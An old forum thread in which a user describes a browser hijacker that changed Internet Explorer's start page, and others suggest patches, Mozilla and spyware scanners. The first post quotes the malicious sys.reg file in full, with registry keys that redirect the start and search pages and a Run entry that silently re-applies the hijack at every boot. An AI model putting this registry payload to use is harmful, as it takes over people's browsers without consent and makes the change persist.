This is scary

qrt123

To make a long story short.
After surfing around, I ended up on an underground page with a million popup pages. I almost couldn't close them all.
But I succeeded in the end.

BUT!!!

After that I had a new starting page in my browser IE6.
And I couldn't get rid of it. It was there every time I turned my computer on.
I found som entries in my registration database, and edited them with regedit of course, but next time I turned my computer on, it was there again.
The starting page was coolsearch.com instead of my own.

THEN, I found a file in my windows folder???!!!
The file was named sys.reg and the content was this:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://t.rack.cc/h.php?aid=35"
"HOMEOldSP"="http://t.rack.cc/h.php?aid=35"
"Search Bar"="http://t.rack.cc/s.php?aid=35"
"Search Page"="http://t.rack.cc/s.php?aid=35"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://t.rack.cc/s.php?aid=35"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://t.rack.cc/h.php?aid=35"
"HOMEOldSP"="http://t.rack.cc/h.php?aid=35"
"Search Bar"="http://t.rack.cc/s.php?aid=35"
"Search Page"="http://t.rack.cc/s.php?aid=35"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://t.rack.cc/s.php?aid=35"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

(the adresse: t.rack.cc/s.php?aid=35 sends you to www.coolsearch.com)

My question is, how did that file end up in my windows folder.
And i did not say yes to anything.
How can one protect one self against things like that. I am using a firewall, you know.
Is it an activeX thing or maybe some tough javascripting that makes this possible.

I really think it's kind of scary.
Does any of You know anything about this???
Is it possible to do that with PHP???

Sincerely
qrt123
The paranoia guy 🙁

drag0n

ehhh... this isnt really a php related question, and no u cant really do it with php, its possible, but if you dont even know if its possible, then tuff to sya, but i dont think ull have a chance making a script to do that, also right now, if i were you i wouldnt concentrate on how to duplicate a page like that instead id be virus scanning and trojan scanning my comp like crazzzzi

keith73

My question is, how did that file end up in my windows folder.
And i did not say yes to anything.
How can one protect one self against things like that. I am using a firewall, you know.
Is it an activeX thing or maybe some tough javascripting that makes this possible.

the file ended up there because IE has holes. make sure you have the latest updates and in your internet options, make sure it prompts you whenever anything tries to run or download.

to protect yourself, use mozilla. It has built-in popup blocking and doesn't have the same type of critical holes that IE has.

get some spyware detection too.
adaware and spybot are good and free.

keith

qrt123

Actually I ran Spybot just the other day, but it didn't find it, but now I know howto manually look for .reg files, don't I. 😉
And those who read this thread, does too. 🙂

Yeah, it might be a hole in IE6 or Windows.
I better go check for new updates.

To dragOn.
I have no intention to make code like that.
I think it is very bad behavior, and it is disrespectful to users of www, and all those who has a homepage without malicious code like that.

Sincerely
qrt123

LordShryku

keith nailed it on the head. Known holes in IE. MS knows about them. They just don't patch them. Mozilla Firebird makes a good replacement.

jasonmills58

Ad Aware is a great ad-ware killer too. Also, I use a pop-up blocker toolbar from dogpile.com - they're a great search engine, and the toolbar works great.